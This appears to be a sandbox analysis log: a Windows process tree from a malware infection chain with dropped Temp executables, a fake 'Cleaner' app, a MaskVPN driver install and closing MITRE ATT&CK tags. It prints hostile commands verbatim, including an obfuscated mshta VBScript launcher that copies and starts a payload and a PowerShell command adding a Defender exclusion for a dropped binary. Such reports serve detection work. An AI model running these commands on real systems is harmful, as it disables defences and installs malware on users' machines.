C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2v0t24jf.cmu\gcleaner.exe /mixfive & exit4⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\2v0t24jf.cmu\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\2v0t24jf.cmu\gcleaner.exe /mixfive5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 2966⤵
- Program crash
PID:4368
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vawdqcqp.zqu\autosubplayer.exe /S & exit4⤵PID:1048
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4964 -ip 49641⤵PID:4788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:4048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4608 -ip 46081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4796 -ip 47961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4272 -ip 42721⤵PID:6072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3040 -ip 30401⤵PID:5448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2212 -ip 22121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1020
-
C:\Users\Admin\AppData\Local\Temp\97DC.exeC:\Users\Admin\AppData\Local\Temp\97DC.exe1⤵PID:6060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5912 -ip 59121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6080
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )1⤵PID:5140
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"2⤵PID:7080
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\ZGAnqbcTm26VKZ7mYmPeq7lT.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\ZGAnqbcTm26VKZ7mYmPeq7lT.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )1⤵PID:5492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\ZGAnqbcTm26VKZ7mYmPeq7lT.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\ZGAnqbcTm26VKZ7mYmPeq7lT.exe" ) do taskkill -f -iM "%~NxA"2⤵PID:6984
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "ZGAnqbcTm26VKZ7mYmPeq7lT.exe"3⤵
- Kills process with taskkill
PID:7100
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:4560 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 30BF9898716345C939B440E10D794393 C2⤵
- Loads dropped DLL
PID:6756
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E9F0D0526164360B7E34D26A4729B002 C2⤵
- Loads dropped DLL
PID:6584
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 42E953193EBA1462603890B1D7BFD5C42⤵PID:6680
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F5D2134F4918C7446F79F76FA0EDEAF2 C2⤵
- Loads dropped DLL
PID:4616
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 16ECFAFB67D020B5959DA3F5E5E326D0 C2⤵PID:2536
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:672
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:2032
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:5740
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffa0c12dec0,0x7ffa0c12ded0,0x7ffa0c12dee05⤵PID:2276
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1bc,0x1c0,0x1c4,0x198,0x1c8,0x7ff783989e70,0x7ff783989e80,0x7ff783989e906⤵PID:7120
-
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1940 /prefetch:25⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:1040
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --mojo-platform-channel-handle=1988 /prefetch:85⤵PID:6080
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2240 /prefetch:15⤵PID:1400
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2248 /prefetch:15⤵PID:5724
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --mojo-platform-channel-handle=2004 /prefetch:85⤵PID:2672
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --mojo-platform-channel-handle=3248 /prefetch:85⤵PID:5704
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3284 /prefetch:25⤵PID:4176
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --mojo-platform-channel-handle=3512 /prefetch:85⤵PID:1092
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --mojo-platform-channel-handle=3840 /prefetch:85⤵PID:2132
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --mojo-platform-channel-handle=3840 /prefetch:85⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5336
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1920,1729562834785662428,16799831876248197810,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5740_1882141902" --mojo-platform-channel-handle=2276 /prefetch:85⤵
- Loads dropped DLL
PID:6680
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D70F.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:1200
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 6116 -ip 61161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 676 -ip 6761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 404 -ip 4041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 3080 -ip 30801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5888 -ip 58881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 5344 -ip 53441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6940
-
C:\Users\Admin\AppData\Local\Temp\66E5.exeC:\Users\Admin\AppData\Local\Temp\66E5.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6204
-
C:\Users\Admin\AppData\Local\Temp\82AB.exeC:\Users\Admin\AppData\Local\Temp\82AB.exe1⤵
- Executes dropped EXE
PID:4608 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 2962⤵
- Program crash
PID:3936
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1568 -ip 15681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6128
-
C:\Users\Admin\AppData\Local\Temp\9D1A.exeC:\Users\Admin\AppData\Local\Temp\9D1A.exe1⤵PID:5336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 2762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6000
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6764 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6392 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6392 -s 4563⤵
- Program crash
PID:3668
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6392 -ip 63921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5248
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 4608 -ip 46081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5336 -ip 53361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6736
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 668 -p 5548 -ip 55481⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\E290.exeC:\Users\Admin\AppData\Local\Temp\E290.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3992
-
C:\Users\Admin\AppData\Local\Temp\1087.exeC:\Users\Admin\AppData\Local\Temp\1087.exe1⤵PID:5336
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 6872 -ip 68721⤵PID:1872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4564 -ip 45641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 3996 -ip 39961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 736 -ip 7361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5264
-
C:\Users\Admin\AppData\Local\Temp\62DE.exeC:\Users\Admin\AppData\Local\Temp\62DE.exe1⤵PID:6264
-
C:\Users\Admin\AppData\Local\Temp\ff3a24b1-2a0a-4b96-8170-87feacdfd518\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\ff3a24b1-2a0a-4b96-8170-87feacdfd518\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ff3a24b1-2a0a-4b96-8170-87feacdfd518\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:2056
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ff3a24b1-2a0a-4b96-8170-87feacdfd518\test.bat"3⤵PID:6324
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\62DE.exe" -Force2⤵PID:1008
-
-
C:\Users\Admin\AppData\Local\Temp\62DE.exeC:\Users\Admin\AppData\Local\Temp\62DE.exe2⤵PID:3056
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 8762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1896
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:5300
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:5208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5572 -ip 55721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3888
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Checks SCSI registry key(s)
PID:5664
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:6836
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3676
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2732
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2216
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵PID:1040
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{06c60afe-2503-784c-8650-9879674c5530}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6020
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180" "e841"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:1664
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6508
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc1⤵PID:5620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵PID:3368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4360 -ip 43601⤵PID:6324
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:4624
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:3860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4788 -ip 47881⤵PID:5812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:6132
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7012 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 4483⤵
- Program crash
PID:4716
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6312 -ip 63121⤵PID:132
-
C:\Users\Admin\AppData\Local\Temp\D033.exeC:\Users\Admin\AppData\Local\Temp\D033.exe1⤵PID:6336
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1